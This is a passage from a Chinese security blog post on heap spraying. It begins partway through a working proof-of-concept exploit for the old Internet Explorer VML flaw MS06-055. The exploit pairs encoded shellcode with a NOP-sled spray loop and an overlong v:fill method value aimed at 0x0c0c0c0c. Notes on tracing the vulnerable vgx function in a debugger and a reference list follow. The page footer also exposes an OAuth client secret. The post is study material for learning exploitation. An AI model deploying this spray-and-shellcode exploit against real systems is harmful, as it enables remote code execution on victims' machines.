shellcode&#x3D;&quot;\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6961\u656e\u6d68\u6769\u8b72\u53c4\u5050\uff53\ufc57\uff53\uf857&quot;;</span><br><span class="line"></span><br><span class="line">var nop&#x3D;&quot;\u9090\u9090&quot;;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">while(nop.length&lt;&#x3D;0x100000&#x2F;2)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	nop+&#x3D;nop;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">nop&#x3D;nop.substring(0,0x100000&#x2F;2-32&#x2F;2-4&#x2F;2-shellcode.length-2&#x2F;2);</span><br><span class="line"></span><br><span class="line">var slide&#x3D;new Array();</span><br><span class="line"></span><br><span class="line">for(var i&#x3D;0;i&lt;200;i++)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	slide[i]&#x3D;nop+shellcode;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:rect style&#x3D;&quot;width:44pt;height:44pt&quot; fillcolor&#x3D;&quot;blue&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;v:fill method&#x3D;&quot;&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0011&amp;#x0012&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&amp;#x0c0c&quot; &#x2F;&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;v:rect&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>



<p>程序跳转到0x0c0c0c0c之后一路滑行，直到滑到下一个1MB的内存空间，执行shellcode。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8PHBT.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8P53n.png" alt=""></p>
<h2 id="2-1-6回顾漏洞挖掘过程"><a href="#2-1-6回顾漏洞挖掘过程" class="headerlink" title="2.1.6回顾漏洞挖掘过程"></a>2.1.6回顾漏洞挖掘过程</h2><p>问：在没有符号表的情况下，我们是如何判断程序的漏洞点的。</p>
<p>其实这个漏洞在挖掘上存在一个巧合，填充大量的Q值，发现程序的EIP并没有跳转到0x51515151，但是程序却非常巧合地断在了漏洞函数中。但是程序并没有触发这个漏洞。</p>
<p>不过就凭这一点，要做后期分析也是非常方便的。</p>
<p>不过我们并不恩感每次漏洞挖掘都期待存在这种巧合。</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8P7uV.png" alt=""></p>
<p>栈回溯技术</p>
<p>我们使用poc中的method参数，假设这是模拟我们在模糊测试中的测试场景，最终会导致EIP跳转。</p>
<p>当Fuzz时，程序发生崩溃。但是当EIP跳转之后，程序会继续运行，然后最终断在某个程序错误中，所以我们很难判断造成程序崩溃的具体函数。</p>
<p>那有没有解决方案呢，我们在这里可以使用栈回溯技术，追踪漏洞的源头。</p>
<p>在运行poc之前首先点击Open or clear run trace，打开栈追踪，然后点击Trace into</p>
<p><img src="https://s2.ax1x.com/2019/10/22/K8Poj0.png" alt=""><br><img src="https://s2.ax1x.com/2019/10/22/K8PbHU.png" alt=""></p>
<p>等到触发崩溃之后，进入栈追踪的窗口（将调试窗口缩小就能看到了，或者点击View-Call Stack）</p>
<p>发现成功追溯到vgx.5AD02D1B,也就是我们产生漏洞的函数。<img src="https://s2.ax1x.com/2019/10/22/K8PLEF.png" alt=""></p>
<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><p>结束了堆喷射的学习，目前就把Win下（IE）漏洞的预备知识都复习了一遍了，接下里来学习就要进入快车道了，接下来将重返UAF漏洞的学习，同时寻找好的案例进行解析和Fuzz学习。</p>
<h1 id="参考文献："><a href="#参考文献：" class="headerlink" title="参考文献："></a>参考文献：</h1><p>[1] <a href="https://me.csdn.net/qq_31922231" target="_blank" rel="noopener">0x3E6</a>.MS06-055（CVE-2006-4868）漏洞分析[DB/OL].</p>
<p><a href="https://blog.csdn.net/qq_31922231/article/details/69791185,2017-04-09" target="_blank" rel="noopener">https://blog.csdn.net/qq_31922231/article/details/69791185,2017-04-09</a></p>
<p>[2]0Day安全:软件漏洞分析技术</p>
<p>[3]magictong.Heap Spray原理浅析[DB.OL].</p>
<p><a href="http://blog.csdn.net/magictong/article/details/7391397,2012-03-24" target="_blank" rel="noopener">http://blog.csdn.net/magictong/article/details/7391397,2012-03-24</a></p>
<p>[4]<a href="https://me.csdn.net/lixiangminghate" target="_blank" rel="noopener">Yuri800</a>.演示Heap Spray(堆喷射)的原理[DB/OL].</p>
<p><a href="https://blog.csdn.net/lixiangminghate/article/details/53413863,2016-12-01" target="_blank" rel="noopener">https://blog.csdn.net/lixiangminghate/article/details/53413863,2016-12-01</a></p>
<p>[5]<a href="https://bbs.pediy.com/user-833287.htm" target="_blank" rel="noopener">噗咚Four</a> .[原创]初识堆喷射及事例(暴雷漏洞)分析[DB/OL].</p>
<p><a href="https://bbs.pediy.com/thread-247937.htm,2018-11-23" target="_blank" rel="noopener">https://bbs.pediy.com/thread-247937.htm,2018-11-23</a></p>
<p>[6] <a href="https://me.csdn.net/LostSpeed" target="_blank" rel="noopener">lostspeed</a>.OD用栈回溯法找程序流程点[DB/OL].</p>
<p><a href="https://blog.csdn.net/lostspeed/article/details/54983244,2017-02-11" target="_blank" rel="noopener">https://blog.csdn.net/lostspeed/article/details/54983244,2017-02-11</a> </p>
<p>[7] <a href="https://xz.aliyun.com/u/8391" target="_blank" rel="noopener">行之</a>.JavaScript中的堆漏洞利用[DB/OL].</p>
<p><a href="https://xz.aliyun.com/t/2107,2018-03-06" target="_blank" rel="noopener">https://xz.aliyun.com/t/2107,2018-03-06</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/10/22/HeapSpray/" data-id="ck4pomc8f001ipo2sgfm2ey3x"
         class="article-share-link">Share</a>
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Exploit/" rel="tag">Exploit</a></li></ul>

    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2019/10/26/Gusubei/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            从东南到东南 --姑苏杯信安大赛小记
          
        </div>
      </a>
    
    
      <a href="/2019/10/18/Win-exploitS-E-H/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">Windows下漏洞利用 S.E.H深入分析</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '5ae4e05700db25ed5406',
      clientSecret: '8a38a8cb845b0b6198a0c59cab9df498ac778343',
      repo: 'migraine-sudo.github.io',
      owner: 'migraine-sudo',
      admin: ['migraine-sudo'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 Migraine</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/fujiang.jpg" alt="Migraine"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/tags">Tags</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>